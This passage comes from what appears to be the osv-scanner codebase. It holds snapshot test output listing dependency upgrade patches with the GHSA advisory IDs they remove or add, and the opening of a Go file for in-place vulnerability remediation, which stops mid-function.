"GHSA-jjjh-jjxp-wpff", "AffectedNodes": [ 15 ] }, { "ID": "GHSA-rgv9-q543-rqg4", "AffectedNodes": [ 15 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.nimbusds:nimbus-jose-jwt" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.37.4", "OrigResolved": "9.13", "NewResolved": "9.37.4" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-gvpg-vgmx-xg6w", "AffectedNodes": [ 28 ] }, { "ID": "GHSA-xwmg-2g98-w7v9", "AffectedNodes": [ 28 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-common" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.118.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.118.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-389x-839f-4rhx", "AffectedNodes": [ 278 ] }, { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { 
"System": 6, "Name": "org.apache.commons:commons-compress" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.26.0", "OrigResolved": "1.21", "NewResolved": "1.26.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-4265-ccf5-phj5", "AffectedNodes": [ 59 ] }, { "ID": "GHSA-4g9r-vxhx-9pgx", "AffectedNodes": [ 59 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-configuration2" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.10.1", "OrigResolved": "2.8.0", "NewResolved": "2.10.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-9w38-p64v-xpmv", "AffectedNodes": [ 127 ] }, { "ID": "GHSA-xjp4-hw94-mvp5", "AffectedNodes": [ 127 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-vfs2" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.10.0", "OrigResolved": "2.6.0", "NewResolved": "2.10.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3936-3gx6-49c4", "AffectedNodes": [ 55 ] }, { "ID": "GHSA-9q4x-fr4m-jp86", "AffectedNodes": [ 55 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.mina:mina-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.22", "OrigResolved": "2.0.7", "NewResolved": "2.0.22" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5h29-qq92-wj7f", "AffectedNodes": [ 167 ] }, { "ID": "GHSA-6mcm-j9cj-3vc3", "AffectedNodes": [ 167 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.pdfbox:pdfbox" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.23", "OrigResolved": "2.0.16", "NewResolved": "2.0.23" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-2h3j-m7gr-25xj", "AffectedNodes": [ 287 ] }, { "ID": "GHSA-6vqp-h455-42mr", "AffectedNodes": [ 287 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-web" }, "Type": 
{}, "OrigRequire": "", "NewRequire": "1.13.0", "OrigResolved": "1.10.0", "NewResolved": "1.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-hhw5-c326-822h", "AffectedNodes": [ 21 ] }, { "ID": "GHSA-pmhc-2g4f-85cg", "AffectedNodes": [ 21 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jetty:jetty-server" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.4.57.v20241219", "OrigResolved": "9.4.52.v20230823", "NewResolved": "9.4.57.v20241219" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g8m5-722r-8whq", "AffectedNodes": [ 243 ] }, { "ID": "GHSA-q4rv-gq96-w7c5", "AffectedNodes": [ 243 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jgit:org.eclipse.jgit" }, "Type": {}, "OrigRequire": "", "NewRequire": "5.13.3.202401111512-r", "OrigResolved": "4.5.4.201711221230-r", "NewResolved": "5.13.3.202401111512-r" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3p86-9955-h393", "AffectedNodes": [ 56 ] }, { "ID": "GHSA-q446-82vq-w674", "AffectedNodes": [ 151 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "xerces:xercesImpl" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.12.0", "OrigResolved": "2.11.0", "NewResolved": "2.12.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-net:commons-net" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.9.0", "OrigResolved": "3.6", "NewResolved": "3.9.0" }, { "Pkg": { "System": 6, "Name": "net.sourceforge.htmlunit:htmlunit" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.37.0", "OrigResolved": "2.18", "NewResolved": "2.37.0" }, { "Pkg": { "System": 6, "Name": "net.sourceforge.htmlunit:neko-htmlunit" }, "Type": {}, "OrigRequire": "", "NewRequire": 
"2.61.0", "OrigResolved": "2.37.0", "NewResolved": "2.61.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5mh9-r3rr-9597", "AffectedNodes": [ 173 ] }, { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-h65f-jvqw-m9fj", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-w4jq-qh47-hvjq", "AffectedNodes": [ 252 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "net.sourceforge.htmlunit:htmlunit" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.37.0", "OrigResolved": "2.18", "NewResolved": "2.37.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5mh9-r3rr-9597", "AffectedNodes": [ 173 ] }, { "ID": "GHSA-7j4h-8wpf-rqfh", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-vmqm-g3vh-847m", "AffectedNodes": [ 252 ] } ], "AddedVulns": [ { "ID": "GHSA-6jmm-mp6w-4rrg", "AffectedNodes": [ 252 ] }, { "ID": "GHSA-cgp8-4m63-fhh5", "AffectedNodes": [ 254 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-handler" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.94.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.94.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-6mjq-h674-j845", "AffectedNodes": [ 257 ] }, { "ID": "GHSA-mm9x-g8pc-w292", "AffectedNodes": [ 257 ] } ], "AddedVulns": [ { "ID": "GHSA-4g8c-wm8x-jfhw", "AffectedNodes": [ 257 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.fasterxml.jackson.core:jackson-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.13.0", "OrigResolved": "2.12.6", "NewResolved": "2.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-wf8f-6423-gfxg", "AffectedNodes": [ 78 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "24.1.1-jre", "OrigResolved": "22.0", "NewResolved": "24.1.1-jre" } ], 
"EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-mvr2-9pj6-7w5j", "AffectedNodes": [ 260 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.jcraft:jsch" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.1.54", "OrigResolved": "0.1.53", "NewResolved": "0.1.54" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-q446-82vq-w674", "AffectedNodes": [ 151 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.nimbusds:nimbus-jose-jwt" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.37.2", "OrigResolved": "9.13", "NewResolved": "9.37.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-gvpg-vgmx-xg6w", "AffectedNodes": [ 28 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-beanutils:commons-beanutils" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.11.0", "OrigResolved": "1.9.4", "NewResolved": "1.11.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-wxr5-93ph-8wr9", "AffectedNodes": [ 20 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-io:commons-io" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.14.0", "OrigResolved": "2.7", "NewResolved": "2.14.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-78wr-2p64-hpwj", "AffectedNodes": [ 42 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.9.8.Final", "OrigResolved": "3.5.2.Final", "NewResolved": "3.9.8.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-xfv3-rrfm-f2rv", "AffectedNodes": [ 175 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-common" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.115.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.115.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": 
[ { "ID": "GHSA-xq3w-v528-46rv", "AffectedNodes": [ 278 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-handler" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.46.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.46.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-mm9x-g8pc-w292", "AffectedNodes": [ 257 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.directory.api:api-ldap-model" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.0.0-M31", "OrigResolved": "1.0.0-M20", "NewResolved": "1.0.0-M31" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-cx3q-cv6w-mx4h", "AffectedNodes": [ 104 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.jackrabbit:jackrabbit-jcr-commons" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.22.2", "OrigResolved": "1.6.5", "NewResolved": "2.22.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-cxvc-g8f2-4gmm", "AffectedNodes": [ 241 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.mina:mina-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.0.21", "OrigResolved": "2.0.7", "NewResolved": "2.0.21" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-5h29-qq92-wj7f", "AffectedNodes": [ 167 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.13.0", "OrigResolved": "1.10.0", "NewResolved": "1.13.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-jc7h-c423-mpjc", "AffectedNodes": [ 19 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.shiro:shiro-web" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.12.0", "OrigResolved": "1.10.0", "NewResolved": "1.12.0" } ], "EcosystemSpecific": null }, 
"RemovedVulns": [ { "ID": "GHSA-pmhc-2g4f-85cg", "AffectedNodes": [ 21 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jetty:jetty-http" }, "Type": {}, "OrigRequire": "", "NewRequire": "12.0.12", "OrigResolved": "9.4.52.v20230823", "NewResolved": "12.0.12" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-qh8g-58pp-2wxh", "AffectedNodes": [ 141 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.eclipse.jetty:jetty-server" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.4.56.v20240826", "OrigResolved": "9.4.52.v20230823", "NewResolved": "9.4.56.v20240826" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g8m5-722r-8whq", "AffectedNodes": [ 243 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.glassfish.jersey.core:jersey-common" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.34", "OrigResolved": "2.30", "NewResolved": "2.34" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-c43q-5hpj-4crv", "AffectedNodes": [ 68 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "xalan:xalan" }, "Type": {}, "OrigRequire": "", "NewRequire": "2.7.3", "OrigResolved": "2.7.2", "NewResolved": "2.7.3" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-9339-86wc-4qgf", "AffectedNodes": [ 249 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.thrift:libthrift" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.14.0", "OrigResolved": "0.13.0", "NewResolved": "0.14.0" }, { "Pkg": { "System": 6, "Name": "org.apache.tomcat.embed:tomcat-embed-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.0.110", "OrigResolved": "8.5.46", "NewResolved": "9.0.110" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g2fg-mr77-6vrm", "AffectedNodes": [ 126 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, 
"Name": "io.netty:netty-codec" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.68.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.68.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "io.netty:netty-handler" }, "Type": {}, "OrigRequire": "", "NewRequire": "4.1.45.Final", "OrigResolved": "4.1.27.Final", "NewResolved": "4.1.45.Final" } ], "EcosystemSpecific": null }, "RemovedVulns": [], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.commons:commons-lang3" }, "Type": {}, "OrigRequire": "", "NewRequire": "3.18.0", "OrigResolved": "3.12.0", "NewResolved": "3.18.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.thrift:libthrift" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.14.0", "OrigResolved": "0.13.0", "NewResolved": "0.14.0" }, { "Pkg": { "System": 6, "Name": "org.apache.tomcat.embed:tomcat-embed-core" }, "Type": {}, "OrigRequire": "", "NewRequire": "9.0.106", "OrigResolved": "8.5.46", "NewResolved": "9.0.106" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g2fg-mr77-6vrm", "AffectedNodes": [ 126 ] } ], "AddedVulns": [ { "ID": "GHSA-gqp3-2cvr-x8m3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-hgrr-935x-pq79", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-vfww-5hm6-hx2j", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-wmwf-9ccg-fff5", "AffectedNodes": [ 179 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "org.apache.thrift:libthrift" }, "Type": {}, "OrigRequire": "", "NewRequire": "0.14.0", "OrigResolved": "0.13.0", "NewResolved": "0.14.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-g2fg-mr77-6vrm", "AffectedNodes": [ 126 ] } ], "AddedVulns": [ { "ID": "GHSA-2rvv-w9r2-rg7m", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-3p2h-wqq4-wf4h", "AffectedNodes": [ 179 ] }, { "ID": 
"GHSA-5j33-cvvr-w245", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-7w75-32cg-r6g2", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-83qj-6fr2-vhqg", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-9xcj-c8cr-8c3c", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-c9hw-wf7x-jp9j", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-f4qf-m5gf-8jm8", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-fccv-jmmp-qg76", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-ff77-26x5-69cr", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-g8pj-r55q-5c2v", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-h2fw-rfh5-95r3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-h3gc-qfqq-6h8f", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-hh3j-x4mc-g48r", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-j39c-c8hj-x4j3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-jgwr-3qm3-26f3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-p22x-g9px-3945", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-q3mw-pvr8-9ggc", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-qppj-fm5r-hxr3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-qxf4-chvg-4r8r", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-r6j3-px5g-cq3x", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-wc4r-xq3c-5cf3", "AffectedNodes": [ 179 ] }, { "ID": "GHSA-wm9w-rjj3-j356", "AffectedNodes": [ 179 ] } ] } ] --- [TestComputeOverridePatches/workaround-commons - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "commons-beanutils:commons-beanutils" }, "Type": {}, "OrigRequire": "", "NewRequire": "1.9.4", "OrigResolved": "20020520", "NewResolved": "1.9.4" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-6phf-73q6-gh87", "AffectedNodes": [ 1 ] } ], "AddedVulns": [] } ] --- [TestComputeOverridePatches/workaround-maven-guava-android-to-android - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "24.0-android", "OrigResolved": "22.0-android", "NewResolved": "24.0-android" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "OSV-000-000", 
"AffectedNodes": [ 1 ] } ], "AddedVulns": [] } ] --- [TestComputeOverridePatches/workaround-maven-guava-jre-to-jre - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "24.0-jre", "OrigResolved": "23.1-jre", "NewResolved": "24.0-jre" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "OSV-000-000", "AffectedNodes": [ 1 ] } ], "AddedVulns": [] } ] --- [TestComputeOverridePatches/workaround-maven-guava-none-to-jre - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 6, "Name": "com.google.guava:guava" }, "Type": {}, "OrigRequire": "", "NewRequire": "24.0-jre", "OrigResolved": "20.0", "NewResolved": "24.0-jre" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "OSV-000-000", "AffectedNodes": [ 1 ] } ], "AddedVulns": [] } ] --- [TestComputeRelaxPatches/npm-santatracker - 1] [ { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "mocha" }, "Type": {}, "OrigRequire": "^5.2.0", "NewRequire": "^10.8.2", "OrigResolved": "5.2.0", "NewResolved": "10.8.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-f8q6-p94x-37v3", "AffectedNodes": [ 573 ] }, { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 577 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 577 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "@google-cloud/cloudbuild" }, "Type": {}, "OrigRequire": "^2.6.0", "NewRequire": "^4.8.1", "OrigResolved": "2.6.0", "NewResolved": "4.8.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7v5v-9h63-cj86", "AffectedNodes": [ 181 ] }, { "ID": "GHSA-h755-8qp9-cq85", "AffectedNodes": [ 192 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "mocha" }, "Type": {}, "OrigRequire": "^5.2.0", "NewRequire": "^9.2.2", "OrigResolved": "5.2.0", "NewResolved": "9.2.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-f8q6-p94x-37v3", "AffectedNodes": [ 573 ] }, { "ID": 
"GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 577 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 577 ] } ], "AddedVulns": [ { "ID": "GHSA-76p7-773f-r4q5", "AffectedNodes": [ 580 ] }, { "ID": "GHSA-mwcw-c2x4-8c55", "AffectedNodes": [ 579 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "@google-cloud/cloudbuild" }, "Type": {}, "OrigRequire": "^2.6.0", "NewRequire": "^3.10.0", "OrigResolved": "2.6.0", "NewResolved": "3.10.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7v5v-9h63-cj86", "AffectedNodes": [ 181 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "autoprefixer" }, "Type": {}, "OrigRequire": "^9.3.0", "NewRequire": "^10.4.21", "OrigResolved": "9.8.8", "NewResolved": "10.4.21" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-7fh5-64p2-3v2j", "AffectedNodes": [ 316 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "dhost" }, "Type": {}, "OrigRequire": "^0.1.9", "NewRequire": "^0.3.5", "OrigResolved": "0.1.9", "NewResolved": "0.3.5" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3xgq-45jj-v275", "AffectedNodes": [ 358 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "firebase" }, "Type": {}, "OrigRequire": "^8.10.0", "NewRequire": "^11.10.0", "OrigResolved": "8.10.1", "NewResolved": "11.10.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-3wf4-68gx-mph8", "AffectedNodes": [ 21 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "google-closure-library" }, "Type": {}, "OrigRequire": "^20190909.0.0", "NewRequire": "^20200315.0.0", "OrigResolved": "20190909.0.0", "NewResolved": "20200315.0.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-vh5w-fg69-rc8m", "AffectedNodes": [ 24 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "terser" }, "Type": {}, "OrigRequire": "^3.10.11", "NewRequire": 
"^4.8.1", "OrigResolved": "3.17.0", "NewResolved": "4.8.1" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-4wf5-vphf-c2xc", "AffectedNodes": [ 44 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "tmp" }, "Type": {}, "OrigRequire": "^0.0.33", "NewRequire": "^0.2.5", "OrigResolved": "0.0.33", "NewResolved": "0.2.5" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-52f5-9888-hmc6", "AffectedNodes": [ 45 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "yargs" }, "Type": {}, "OrigRequire": "^12.0.2", "NewRequire": "^13.3.2", "OrigResolved": "12.0.5", "NewResolved": "13.3.2" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-p9pc-299p-vxgp", "AffectedNodes": [ 601 ] } ], "AddedVulns": [] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "mocha" }, "Type": {}, "OrigRequire": "^5.2.0", "NewRequire": "^6.2.3", "OrigResolved": "5.2.0", "NewResolved": "6.2.3" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 577 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 577 ] } ], "AddedVulns": [ { "ID": "GHSA-2j2x-2gpw-g8fm", "AffectedNodes": [ 690 ] }, { "ID": "GHSA-gxpj-cx7g-858c", "AffectedNodes": [ 568 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "mocha" }, "Type": {}, "OrigRequire": "^5.2.0", "NewRequire": "^8.4.0", "OrigResolved": "5.2.0", "NewResolved": "8.4.0" } ], "EcosystemSpecific": null }, "RemovedVulns": [ { "ID": "GHSA-vh95-rmgr-6w4m", "AffectedNodes": [ 577 ] }, { "ID": "GHSA-xvch-5gv4-984h", "AffectedNodes": [ 577 ] } ], "AddedVulns": [ { "ID": "GHSA-mwcw-c2x4-8c55", "AffectedNodes": [ 579 ] }, { "ID": "GHSA-qrpm-p2h7-hrv2", "AffectedNodes": [ 579 ] } ] }, { "Patch": { "Deps": [ { "Pkg": { "System": 3, "Name": "firebase" }, "Type": {}, "OrigRequire": "^8.10.0", "NewRequire": "^10.14.1", "OrigResolved": "8.10.1", "NewResolved": "10.14.1" } ], "EcosystemSpecific": null }, 
"RemovedVulns": [ { "ID": "GHSA-3wf4-68gx-mph8", "AffectedNodes": [ 21 ] } ], "AddedVulns": [ { "ID": "GHSA-c76h-2ccp-4975", "AffectedNodes": [ 409 ] }, { "ID": "GHSA-cxrh-j4jr-qwg3", "AffectedNodes": [ 409 ] } ] } ] --- ================================================ FILE: internal/remediation/in_place.go ================================================ // Package remediation provides logic for Guided Remediation. package remediation import ( "cmp" "context" "errors" "maps" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/clients/clientinterfaces" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" lf "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/resolution/util" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type InPlacePatch struct { lf.DependencyPatch ResolvedVulns []resolution.Vulnerability } type InPlaceResult struct { Patches []InPlacePatch Unfixable []resolution.Vulnerability } type VulnCount struct { Direct int Transitive int // Note: These are metrics that overlap with Direct/Transitive, and with each other. 
Unfixable int Dev int } func (vc VulnCount) Total() int { return vc.Direct + vc.Transitive } func (r InPlaceResult) VulnCount() VulnCount { devCount := 0 directCount := 0 transitiveCount := 0 for _, rv := range r.Unfixable { if rv.DevOnly { devCount++ } if rv.IsDirect() { directCount++ } else { transitiveCount++ } } // Key vulnerabilities by (ID, package name, package version) to be consistent with scan action's counting type vulnKey struct { id string vk resolve.VersionKey } uniqueVulns := make(map[vulnKey]struct { dev bool direct bool }) for _, p := range r.Patches { vk := resolve.VersionKey{PackageKey: p.Pkg, Version: p.OrigVersion} for _, rv := range p.ResolvedVulns { key := vulnKey{id: rv.OSV.GetId(), vk: vk} d, ok := uniqueVulns[key] if !ok { d.dev = rv.DevOnly d.direct = rv.IsDirect() } else { d.dev = d.dev && rv.DevOnly d.direct = d.direct || 